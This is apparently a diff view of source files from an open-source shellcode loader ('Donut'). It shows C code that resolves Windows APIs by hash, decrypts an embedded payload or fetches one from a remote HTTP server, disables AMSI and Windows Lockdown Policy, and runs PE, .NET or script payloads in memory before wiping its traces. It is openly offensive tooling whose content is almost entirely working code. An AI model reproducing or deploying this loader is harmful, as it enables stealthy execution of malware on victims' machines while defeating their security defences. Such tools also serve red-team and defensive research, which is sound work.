475 if(!inst->api.RtlEqualString(&ansi, mbs, TRUE)) continue;
476 // overwrite existing command line for GetCommandLineA
477 inst->api.RtlUnicodeStringToAnsiString(&ansi, wcs, TRUE);
478 Memcpy(&ds[i], &ansi, sizeof(ANSI_STRING));
479 DPRINT("New BaseAnsiCommandLine at %p : %s", &ds[i], GetCommandLineA());
480 break;
481 }
482
483 ldr = (PPEB_LDR_DATA)peb->Ldr;
484
485 // for each DLL loaded
486 for (dte=(PLDR_DATA_TABLE_ENTRY)ldr->InLoadOrderModuleList.Flink;
487 dte->DllBase != NULL;
488 dte=(PLDR_DATA_TABLE_ENTRY)dte->InLoadOrderLinks.Flink)
489 {
490 // check for exported symbols and patch according to string type
491 str = (PCHAR)inst->cmd_syms;
492
493 for(;;) {
494 // reset flags
495 atype = 1; fptr = 0;
496 // store string until null byte or semi-colon encountered
497 for(i=0; str[i] != '\0' && str[i] !=';' && i<128; i++) {
498 // w indicates unicode type
499 if(str[i] == 'w') atype = 0;
500 // p indicates function pointer
501 if(str[i] == 'p') fptr = 1;
502 // store byte
503 sym[i] = str[i];
504 }
505 // nothing stored? end loop for this DLL
506 if(i == 0) break;
507 // skip name plus one for separator
508 str += (i + 1);
509 // store null terminator
510 sym[i] = '\0';
511 // see if it can be resolved for current module
512 addr = inst->api.GetProcAddress(dte->DllBase, sym);
513 // nothing resolve? get the next symbol from list
514 if(addr == NULL) continue;
515 // is this ansi?
516 if(atype) {
517 argv = (PCHAR*)addr;
518 // pointer?
519 if(fptr != 0) {
520 p_acmdln = (p_acmdln_t)addr;
521 argv = p_acmdln();
522 }
523 // anything to patch?
524 if(argv != NULL && *argv != NULL) {
525 DPRINT("Setting %ws!%s \"%s\" to \"%s\"",
526 dte->BaseDllName.Buffer, sym, *argv, ansi.Buffer);
527 *argv = ansi.Buffer;
528 }
529 } else {
530 wargv = (PWCHAR*)addr;
531 // pointer?
532 if(fptr != 0) {
533 p_wcmdln = (p_wcmdln_t)addr;
534 wargv = p_wcmdln();
535 }
536 // anything to patch?
537 if(wargv != NULL && *wargv != NULL) {
538 DPRINT("Setting %ws!%s \"%ws\" to \"%ws\"",
539 dte->BaseDllName.Buffer, sym, *wargv, wcs->Buffer);
540 *wargv = wcs->Buffer;
541 }
542 }
543 }
544 }
545 return TRUE;
546 }
+153
-0
loader/inmem_script.c less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 VOID RunScript(PDONUT_INSTANCE inst, PDONUT_MODULE mod) {
32 HRESULT hr;
33 IActiveScriptParse *parser;
34 IActiveScript *engine;
35 MyIActiveScriptSite mas;
36 IActiveScriptSiteVtbl activescript_vtbl;
37 IActiveScriptSiteWindowVtbl siteWnd_vtbl;
38 IHostVtbl wscript_vtbl;
39 PWCHAR script;
40 ULONG64 len;
41 BSTR obj;
42 BOOL disabled;
43 WCHAR buf[DONUT_MAX_NAME+1];
44
45 // 1. Allocate memory for unicode format of script
46 script = (PWCHAR)inst->api.VirtualAlloc(
47 NULL,
48 (inst->mod_len + 1) * sizeof(WCHAR),
49 MEM_COMMIT | MEM_RESERVE,
50 PAGE_READWRITE);
51
52 // 2. Convert string to unicode.
53 if(script != NULL) {
54 // 2. Convert string to unicode.
55 inst->api.MultiByteToWideChar(CP_ACP, 0, mod->data,
56 -1, script, mod->len * sizeof(WCHAR));
57
58 // setup the IActiveScriptSite interface
59 mas.site.lpVtbl = (IActiveScriptSiteVtbl*)&activescript_vtbl;
60 ActiveScript_New(inst, &mas.site);
61
62 // setup the IActiveScriptSiteWindow interface for GUI stuff
63 mas.siteWnd.lpVtbl = (IActiveScriptSiteWindowVtbl*)&siteWnd_vtbl;
64 ActiveScriptSiteWindow_New(inst, &mas.siteWnd);
65
66 // setup the IHost interface for WScript object
67 mas.wscript.lpVtbl = (IHostVtbl*)&wscript_vtbl;
68 Host_New(inst, &mas.wscript);
69
70 // 4. Initialize COM, MyIActiveScriptSite
71 DPRINT("CoInitializeEx");
72 hr = inst->api.CoInitializeEx(NULL, COINIT_MULTITHREADED);
73
74 if(hr == S_OK) {
75 // 5. Instantiate the active script engine
76 DPRINT("CoCreateInstance(IID_IActiveScript)");
77
78 hr = inst->api.CoCreateInstance(
79 &inst->xCLSID_ScriptLanguage, 0,
80 CLSCTX_INPROC_SERVER | CLSCTX_INPROC_HANDLER,
81 &inst->xIID_IActiveScript, (void **)&engine);
82
83 if(hr == S_OK) {
84 // 6. Get IActiveScriptParse object from engine
85 DPRINT("IActiveScript::QueryInterface(IActiveScriptParse)");
86
87 hr = engine->lpVtbl->QueryInterface(
88 engine,
89 #ifdef _WIN64
90 &inst->xIID_IActiveScriptParse64,
91 #else
92 &inst->xIID_IActiveScriptParse32,
93 #endif
94 (void **)&parser);
95
96 if(hr == S_OK) {
97 // 7. Initialize parser
98 DPRINT("IActiveScriptParse::InitNew");
99 hr = parser->lpVtbl->InitNew(parser);
100
101 if(hr == S_OK) {
102 // 8. Set custom script interface
103 DPRINT("IActiveScript::SetScriptSite");
104 mas.wscript.lpEngine = engine;
105
106 hr = engine->lpVtbl->SetScriptSite(
107 engine, (IActiveScriptSite *)&mas);
108
109 if(hr == S_OK) {
110 DPRINT("IActiveScript::AddNamedItem(\"%s\")", inst->wscript);
111 ansi2unicode(inst, inst->wscript, buf);
112 obj = inst->api.SysAllocString(buf);
113 hr = engine->lpVtbl->AddNamedItem(engine, (LPCOLESTR)obj, SCRIPTITEM_ISVISIBLE);
114 inst->api.SysFreeString(obj);
115
116 if(hr == S_OK) {
117 // 9. Load script
118 DPRINT("IActiveScriptParse::ParseScriptText");
119 hr = parser->lpVtbl->ParseScriptText(
120 parser, (LPCOLESTR)script, NULL, NULL, NULL, 0, 0, 0, NULL, NULL);
121
122 if(hr == S_OK) {
123 // 10. Run script
124 DPRINT("IActiveScript::SetScriptState(SCRIPTSTATE_CONNECTED)");
125 hr = engine->lpVtbl->SetScriptState(
126 engine, SCRIPTSTATE_CONNECTED);
127
128 // SetScriptState blocks here
129 }
130 }
131 }
132 }
133 DPRINT("IActiveScriptParse::Release");
134 parser->lpVtbl->Release(parser);
135 }
136 DPRINT("IActiveScript::Close");
137 engine->lpVtbl->Close(engine);
138
139 DPRINT("IActiveScript::Release");
140 engine->lpVtbl->Release(engine);
141 }
142 }
143 DPRINT("Erasing script from memory");
144 Memset(script, 0, (inst->mod_len + 1) * sizeof(WCHAR));
145
146 DPRINT("VirtualFree(script)");
147 inst->api.VirtualFree(script, 0, MEM_RELEASE | MEM_DECOMMIT);
148 }
149 }
150
151 #include "activescript.c"
152 #include "wscript.c"
+438
-0
loader/loader.c less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #include "loader.h"
32
33 DWORD MainProc(PDONUT_INSTANCE inst);
34
35 HANDLE DonutLoader(PDONUT_INSTANCE inst) {
36 CreateThread_t _CreateThread;
37 GetThreadContext_t _GetThreadContext;
38 GetCurrentThread_t _GetCurrentThread;
39 NtContinue_t _NtContinue;
40 ULONG64 hash;
41 HANDLE h = NULL;
42 CONTEXT c;
43
44 // create thread and execute original entrypoint?
45 if(inst->oep != 0) {
46 DPRINT("Resolving address of CreateThread");
47 hash = inst->api.hash[ (offsetof(DONUT_INSTANCE, api.CreateThread) - offsetof(DONUT_INSTANCE, api)) / sizeof(ULONG_PTR)];
48 _CreateThread = (CreateThread_t)xGetProcAddress(inst, hash, inst->iv);
49
50 // api resolved?
51 if(_CreateThread != NULL) {
52 // create new thread
53 DPRINT("Creating new thread");
54 h = _CreateThread(NULL, 0, ADR(LPTHREAD_START_ROUTINE, MainProc), (LPVOID)inst, 0, NULL);
55 } else {
56 DPRINT("FAILED");
57 return (HANDLE)-1;
58 }
59
60 DPRINT("Resolving address of NtContinue");
61 hash = inst->api.hash[ (offsetof(DONUT_INSTANCE, api.NtContinue) - offsetof(DONUT_INSTANCE, api)) / sizeof(ULONG_PTR)];
62 _NtContinue = (NtContinue_t)xGetProcAddress(inst, hash, inst->iv);
63
64 DPRINT("Resolving address of GetThreadContext");
65 hash = inst->api.hash[ (offsetof(DONUT_INSTANCE, api.GetThreadContext) - offsetof(DONUT_INSTANCE, api)) / sizeof(ULONG_PTR)];
66 _GetThreadContext = (GetThreadContext_t)xGetProcAddress(inst, hash, inst->iv);
67
68 DPRINT("Resolving address of GetCurrentThread");
69 hash = inst->api.hash[ (offsetof(DONUT_INSTANCE, api.GetCurrentThread) - offsetof(DONUT_INSTANCE, api)) / sizeof(ULONG_PTR)];
70 _GetCurrentThread = (GetCurrentThread_t)xGetProcAddress(inst, hash, inst->iv);
71
72 if(_NtContinue != NULL && _GetThreadContext != NULL && _GetCurrentThread != NULL) {
73 c.ContextFlags = CONTEXT_FULL;
74 _GetThreadContext(_GetCurrentThread(), &c);
75 #ifdef _WIN64
76 c.Rip = inst->oep;
77 c.Rsp &= -16;
78 #else
79 c.Eip = inst->oep;
80 c.Esp &= -4;
81 #endif
82 DPRINT("Calling NtContinue");
83 //__debugbreak();
84 _NtContinue(&c, FALSE);
85 }
86 } else {
87 // execute in existing thread
88 MainProc(inst);
89 }
90 return h;
91 }
92
93 DWORD MainProc(PDONUT_INSTANCE inst) {
94 ULONG i, ofs, wspace, fspace, len;
95 ULONG64 sig;
96 DONUT_ASSEMBLY assembly;
97 PDONUT_MODULE mod, unpck;
98 VirtualAlloc_t _VirtualAlloc;
99 VirtualFree_t _VirtualFree;
100 RtlExitUserProcess_t _RtlExitUserProcess;
101 LPVOID pv, ws;
102 ULONG64 hash;
103 BOOL disabled, term;
104 NTSTATUS nts;
105 PCHAR str;
106 CHAR path[MAX_PATH];
107
108 DPRINT("Maru IV : %" PRIX64, inst->iv);
109
110 hash = inst->api.hash[ (offsetof(DONUT_INSTANCE, api.VirtualAlloc) - offsetof(DONUT_INSTANCE, api)) / sizeof(ULONG_PTR)];
111 DPRINT("Resolving address for VirtualAlloc() : %" PRIX64, hash);
112 _VirtualAlloc = (VirtualAlloc_t)xGetProcAddress(inst, hash, inst->iv);
113
114 hash = inst->api.hash[ (offsetof(DONUT_INSTANCE, api.VirtualFree) - offsetof(DONUT_INSTANCE, api)) / sizeof(ULONG_PTR)];
115 DPRINT("Resolving address for VirtualFree() : %" PRIX64, hash);
116 _VirtualFree = (VirtualFree_t) xGetProcAddress(inst, hash, inst->iv);
117
118 hash = inst->api.hash[ (offsetof(DONUT_INSTANCE, api.RtlExitUserProcess) - offsetof(DONUT_INSTANCE, api)) / sizeof(ULONG_PTR)];
119 DPRINT("Resolving address for RtlExitUserProcess() : %" PRIX64, hash);
120 _RtlExitUserProcess = (RtlExitUserProcess_t) xGetProcAddress(inst, hash, inst->iv);
121
122 if(_VirtualAlloc == NULL || _VirtualFree == NULL || _RtlExitUserProcess == NULL) {
123 DPRINT("FAILED!.");
124 return -1;
125 }
126
127 DPRINT("VirtualAlloc : %p VirtualFree : %p",
128 (LPVOID)_VirtualAlloc, (LPVOID)_VirtualFree);
129
130 DPRINT("Allocating %i bytes of RW memory", inst->len);
131 pv = _VirtualAlloc(NULL, inst->len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
132
133 if(pv == NULL) {
134 DPRINT("Memory allocation failed...");
135 // terminate host process?
136 if(inst->exit_opt == DONUT_OPT_EXIT_PROCESS) {
137 DPRINT("Terminating host process");
138 _RtlExitUserProcess(0);
139 }
140 return -1;
141 }
142 DPRINT("Copying %i bytes of data to memory %p", inst->len, pv);
143 Memcpy(pv, inst, inst->len);
144 inst = (PDONUT_INSTANCE)pv;
145
146 DPRINT("Zero initializing PDONUT_ASSEMBLY");
147 Memset(&assembly, 0, sizeof(assembly));
148
149 // if encryption used
150 if(inst->entropy == DONUT_ENTROPY_DEFAULT) {
151 PBYTE inst_data;
152 // load pointer to data just past len + key
153 inst_data = (PBYTE)inst + offsetof(DONUT_INSTANCE, api_cnt);
154
155 DPRINT("Decrypting %li bytes of instance", inst->len);
156
157 donut_decrypt(inst->key.mk,
158 inst->key.ctr,
159 inst_data,
160 inst->len - offsetof(DONUT_INSTANCE, api_cnt));
161
162 DPRINT("Generating hash to verify decryption");
163 ULONG64 mac = maru(inst->sig, inst->iv);
164 DPRINT("Instance : %"PRIX64" | Result : %"PRIX64, inst->mac, mac);
165
166 if(mac != inst->mac) {
167 DPRINT("Decryption of instance failed");
168 goto erase_memory;
169 }
170 }
171 DPRINT("Resolving LoadLibraryA");
172
173 inst->api.addr[0] = xGetProcAddress(inst, inst->api.hash[0], inst->iv);
174 if(inst->api.addr[0] == NULL) return -1;
175
176 str = (PCHAR)inst->dll_names;
177
178 // load the DLL required
179 for(;;) {
180 // store string until null byte or semi-colon encountered
181 for(i=0; str[i] != '\0' && str[i] !=';' && i<MAX_PATH; i++) path[i] = str[i];
182 // nothing stored? end
183 if(i == 0) break;
184 // skip name plus one for separator
185 str += (i + 1);
186 // store null terminator
187 path[i] = '\0';
188 DPRINT("Loading %s", path);
189 inst->api.LoadLibraryA(path);
190 }
191
192 DPRINT("Resolving %i API", inst->api_cnt);
193
194 for(i=1; i<inst->api_cnt; i++) {
195 DPRINT("Resolving API address for %016llX", inst->api.hash[i]);
196
197 inst->api.addr[i] = xGetProcAddress(inst, inst->api.hash[i], inst->iv);
198
199 if(inst->api.addr[i] == NULL) {
200 DPRINT("Failed to resolve API");
201 goto erase_memory;
202 }
203 }
204
205 if(inst->type == DONUT_INSTANCE_HTTP) {
206 DPRINT("Module is stored on remote HTTP server.");
207 if(!DownloadFromHTTP(inst)) goto erase_memory;
208 mod = inst->module.p;
209 } else
210 if(inst->type == DONUT_INSTANCE_DNS) {
211 DPRINT("Module is stored on remote DNS server. (Currently unsupported)");
212 goto erase_memory;
213 //if(!DownloadFromDNS(inst)) goto erase_memory;
214 mod = inst->module.p;
215 } else
216 if(inst->type == DONUT_INSTANCE_EMBED) {
217 DPRINT("Module is embedded.");
218 mod = (PDONUT_MODULE)&inst->module.x;
219 }
220
221 // try bypassing AMSI and WLDP?
222 if(inst->bypass != DONUT_BYPASS_NONE) {
223 // Try to disable AMSI
224 disabled = DisableAMSI(inst);
225 DPRINT("DisableAMSI %s", disabled ? "OK" : "FAILED");
226 if(!disabled && inst->bypass == DONUT_BYPASS_ABORT)
227 goto erase_memory;
228
229 // Try to disable WLDP
230 disabled = DisableWLDP(inst);
231 DPRINT("DisableWLDP %s", disabled ? "OK" : "FAILED");
232 if(!disabled && inst->bypass == DONUT_BYPASS_ABORT)
233 goto erase_memory;
234 }
235
236 // module is compressed?
237 if(mod->compress != DONUT_COMPRESS_NONE) {
238 DPRINT("Compression engine is %"PRIx32, mod->compress);
239
240 DPRINT("Allocating %zd bytes of memory for decompressed file and module information",
241 mod->len + sizeof(DONUT_MODULE));
242
243 // allocate memory for module information + size of decompressed data
244 unpck = (PDONUT_MODULE)_VirtualAlloc(
245 NULL, ((sizeof(DONUT_MODULE) + mod->len) -4096) + 4096,
246 MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
247
248 if(unpck == NULL) goto erase_memory;
249
250 // copy the existing information to new block
251 DPRINT("Duplicating DONUT_MODULE");
252 Memcpy(unpck, mod, sizeof(DONUT_MODULE));
253
254 // decompress module data into new block
255 DPRINT("Decompressing %"PRId32 " -> %"PRId32, mod->zlen, mod->len);
256
257 if(mod->compress == DONUT_COMPRESS_LZNT1 ||
258 mod->compress == DONUT_COMPRESS_XPRESS ||
259 mod->compress == DONUT_COMPRESS_XPRESS_HUFF)
260 {
261 nts = inst->api.RtlGetCompressionWorkSpaceSize(
262 (mod->compress - 1) | COMPRESSION_ENGINE_MAXIMUM, &wspace, &fspace);
263
264 if(nts != 0) {
265 DPRINT("RtlGetCompressionWorkSpaceSize failed with %"PRIX32, nts);
266 goto erase_memory;
267 }
268
269 DPRINT("WorkSpace size : %"PRId32" | Fragment size : %"PRId32, wspace, fspace);
270
271 ws = (PDONUT_MODULE)_VirtualAlloc(
272 NULL, wspace, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
273
274 DPRINT("Decompressing with RtlDecompressBufferEx(%s)",
275 mod->compress == DONUT_COMPRESS_LZNT1 ? "LZNT" :
276 mod->compress == DONUT_COMPRESS_XPRESS ? "XPRESS" : "XPRESS HUFFMAN");
277
278 nts = inst->api.RtlDecompressBufferEx(
279 (mod->compress - 1) | COMPRESSION_ENGINE_MAXIMUM,
280 (PUCHAR)unpck->data, mod->len,
281 (PUCHAR)&mod->data, mod->zlen, &len, ws);
282
283 _VirtualFree(ws, 0, MEM_RELEASE | MEM_DECOMMIT);
284
285 if(nts == 0) {
286 // assign pointer to mod
287 mod = unpck;
288 } else {
289 DPRINT("RtlDecompressBufferEx failed with %"PRIX32, nts);
290 goto erase_memory;
291 }
292 } else if(mod->compress == DONUT_COMPRESS_APLIB) {
293 DPRINT("Decompressing with aPLib");
294 aP_depack((PUCHAR)mod->data, (PUCHAR)unpck->data);
295 DPRINT("Done");
296 mod = unpck;
297 } else {
298 //
299 }
300 }
301 DPRINT("Checking type of module");
302
303 // unmanaged EXE/DLL?
304 if(mod->type == DONUT_MODULE_DLL ||
305 mod->type == DONUT_MODULE_EXE) {
306 RunPE(inst, mod);
307 } else
308 // .NET EXE/DLL?
309 if(mod->type == DONUT_MODULE_NET_DLL ||
310 mod->type == DONUT_MODULE_NET_EXE)
311 {
312 if(LoadAssembly(inst, mod, &assembly)) {
313 RunAssembly(inst, mod, &assembly);
314 }
315 FreeAssembly(inst, &assembly);
316 } else
317 // vbs or js?
318 if(mod->type == DONUT_MODULE_VBS ||
319 mod->type == DONUT_MODULE_JS)
320 {
321 RunScript(inst, mod);
322 }
323
324 erase_memory:
325 // if module was downloaded
326 if(inst->type == DONUT_INSTANCE_HTTP ||
327 inst->type == DONUT_INSTANCE_DNS)
328 {
329 if(inst->module.p != NULL) {
330 // overwrite memory with zeros
331 Memset(inst->module.p, 0, (DWORD)inst->mod_len);
332
333 // free memory
334 _VirtualFree(inst->module.p, 0, MEM_RELEASE | MEM_DECOMMIT);
335 inst->module.p = NULL;
336 }
337 }
338
339 // should we call RtlExitUserProcess?
340 term = (BOOL) (inst->exit_opt == DONUT_OPT_EXIT_PROCESS);
341
342 DPRINT("Erasing RW memory for instance");
343 Memset(inst, 0, inst->len);
344
345 DPRINT("Releasing RW memory for instance");
346 _VirtualFree(inst, 0, MEM_DECOMMIT | MEM_RELEASE);
347
348 if(term) {
349 DPRINT("Terminating host process");
350 // terminate host process
351 _RtlExitUserProcess(0);
352 }
353 DPRINT("Returning to caller");
354 // return to caller, which invokes RtlExitUserThread
355 return 0;
356 }
357
358 int ansi2unicode(PDONUT_INSTANCE inst, CHAR input[], WCHAR output[DONUT_MAX_NAME]) {
359 return inst->api.MultiByteToWideChar(CP_ACP, 0, input,
360 -1, output, DONUT_MAX_NAME);
361 }
362
363 #include "peb.c" // resolve functions in export table
364 #include "http_client.c" // Download module from HTTP server
365 //#include "dns_client.c" // Download module from DNS server
366 #include "inmem_dotnet.c" // .NET assemblies
367 #include "inmem_pe.c" // Unmanaged PE/DLL files
368 #include "inmem_script.c" // VBS/JS files
369
370 #include "bypass.c" // Bypass AMSI and WLDP
371 #include "getpc.c" // code stub to return program counter (always at the end!)
372
373 // the following code is *only* for development purposes
374 // given an instance file, it will run as if running on a target system
375 // attach a debugger to host process
376 #ifdef DEBUG
377
378 #include <stdio.h>
379 #include <string.h>
380 #include <stdlib.h>
381 #include <sys/stat.h>
382
383 int main(int argc, char *argv[]) {
384 FILE *fd;
385 struct stat fs;
386 PDONUT_INSTANCE inst;
387 DWORD old;
388 HANDLE h;
389
390 if(argc != 2) {
391 printf(" [ usage: loader <instance>\n");
392 return 0;
393 }
394 // get size of instance
395 if(stat(argv[1], &fs) != 0) {
396 printf(" [ unable to obtain size of instance.\n");
397 return 0;
398 }
399
400 // zero size?
401 if(fs.st_size == 0) {
402 printf(" [ invalid instance.\n");
403 return 0;
404 }
405
406 // try open for reading
407 fd = fopen(argv[1], "rb");
408 if(fd == NULL) {
409 printf(" [ unable to open %s.\n", argv[1]);
410 return 0;
411 }
412
413 // allocate memory
414 inst = (PDONUT_INSTANCE)VirtualAlloc(NULL, fs.st_size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
415
416 if(inst != NULL) {
417 fread(inst, 1, fs.st_size, fd);
418
419 // change protection to PAGE_EXECUTE_READ
420 if(VirtualProtect((LPVOID)inst, fs.st_size, PAGE_EXECUTE_READ, &old)) {
421 printf("Running...");
422
423 // run payload with instance
424 h = DonutLoader(inst);
425
426 if(h != (HANDLE)-1 && inst->oep != 0) {
427 printf("\nWaiting...");
428 WaitForSingleObject(h, INFINITE);
429 }
430 }
431 // deallocate
432 VirtualFree((LPVOID)inst, 0, MEM_DECOMMIT | MEM_RELEASE);
433 }
434 fclose(fd);
435 return 0;
436 }
437 #endif
+148
-0
loader/loader.h less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #ifndef LOADER_H
32 #define LOADER_H
33
34 #if !defined(_MSC_VER)
35 #define __out_ecount_full(x)
36 #define __out_ecount_full_opt(x)
37 #include <inttypes.h>
38 #endif
39
40 #include <windows.h>
41 #include <wincrypt.h>
42 #include <oleauto.h>
43 #include <objbase.h>
44 #include <wininet.h>
45 #include <shlwapi.h>
46
47 #pragma comment(lib, "wininet.lib")
48 #pragma comment(lib, "advapi32.lib")
49 #pragma comment(lib, "crypt32.lib")
50 #pragma comment(lib, "ole32.lib")
51 #pragma comment(lib, "shlwapi.lib")
52 #pragma comment(lib, "shell32.lib")
53
54 #if defined(DEBUG)
55 #include <stdio.h>
56 #include <string.h>
57
58 #define __FILENAME__ (strrchr(__FILE__, '\\') ? strrchr(__FILE__, '\\') + 1 : __FILE__)
59
60 #define DPRINT(...) { \
61 fprintf(stderr, "\nDEBUG: %s:%d:%s(): ", __FILENAME__, __LINE__, __FUNCTION__); \
62 fprintf(stderr, __VA_ARGS__); \
63 }
64 #else
65 #define DPRINT(...) // Don't do anything in release builds
66 #endif
67
68 #define STATIC_KEY ((__TIME__[7] - '0') * 1 + (__TIME__[6] - '0') * 10 + \
69 (__TIME__[4] - '0') * 60 + (__TIME__[3] - '0') * 600 + \
70 (__TIME__[1] - '0') * 3600 + (__TIME__[0] - '0') * 36000)
71
72 // Relative Virtual Address to Virtual Address
73 #define RVA2VA(type, base, rva) (type)((ULONG_PTR) base + rva)
74
75 #if defined(_M_IX86) || defined(__i386__)
76 // return pointer to code in memory
77 char *get_pc(void);
78
79 // PC-relative addressing for x86 code. Similar to RVA2VA except using functions in payload
80 #define ADR(type, addr) (type)(get_pc() - ((ULONG_PTR)&get_pc - (ULONG_PTR)addr))
81 #else
82 #define ADR(type, addr) (type)(addr) // do nothing on 64-bit
83 #endif
84
85 void *Memset(void *ptr, int value, unsigned int num);
86 void *Memcpy(void *destination, const void *source, unsigned int num);
87 int Memcmp(const void *ptr1, const void *ptr2, unsigned int num);
88 int _strcmp(const char *s1, const char *s2);
89 NTSTATUS RtlUserThreadStart(LPTHREAD_START_ROUTINE lpStartAddress, LPVOID lpParameter);
90
91 #if !defined(_MSC_VER)
92 #define memcmp(x,y,z) Memcmp(x,y,z)
93 #endif
94
95 #include "depack.h"
96 #include "peb.h" // Process Environment Block
97 #include "winapi.h" // Prototypes
98 #include "clr.h" // Common Language Runtime Interface
99
100 #include "donut.h"
101
102 #include "amsi.h" // Anti-malware Scan Interface
103 #include "activescript.h" // Interfaces for executing VBS/JS files
104 #include "wscript.h" // Interfaces to support WScript object
105
106 typedef struct {
107 IActiveScriptSite site;
108 IActiveScriptSiteWindow siteWnd;
109 IHost wscript;
110 PDONUT_INSTANCE inst; //
111 } MyIActiveScriptSite;
112
113 // internal structure
114 typedef struct _DONUT_ASSEMBLY {
115 ICLRMetaHost *icmh;
116 ICLRRuntimeInfo *icri;
117 ICorRuntimeHost *icrh;
118 IUnknown *iu;
119 AppDomain *ad;
120 Assembly *as;
121 Type *type;
122 MethodInfo *mi;
123 } DONUT_ASSEMBLY, *PDONUT_ASSEMBLY;
124
125 // Downloads a module from remote HTTP server into memory
126 BOOL DownloadFromHTTP(PDONUT_INSTANCE);
127
128 // .NET DLL/EXE
129 BOOL LoadAssembly(PDONUT_INSTANCE, PDONUT_MODULE, PDONUT_ASSEMBLY);
130 BOOL RunAssembly(PDONUT_INSTANCE, PDONUT_MODULE, PDONUT_ASSEMBLY);
131 VOID FreeAssembly(PDONUT_INSTANCE, PDONUT_ASSEMBLY);
132
133 // In-Memory execution of native DLL
134 VOID RunPE(PDONUT_INSTANCE, PDONUT_MODULE);
135
136 // VBS / JS files
137 VOID RunScript(PDONUT_INSTANCE, PDONUT_MODULE);
138
139 // Disables Antimalware Scan Interface
140 BOOL DisableAMSI(PDONUT_INSTANCE);
141
142 // Disables Windows Lockdown Policy
143 BOOL DisableWLDP(PDONUT_INSTANCE);
144
145 LPVOID xGetProcAddress(PDONUT_INSTANCE, ULONGLONG, ULONGLONG);
146
147 #endif
+1
-0
loader/order.txt less more
0 DonutLoader
+144
-0
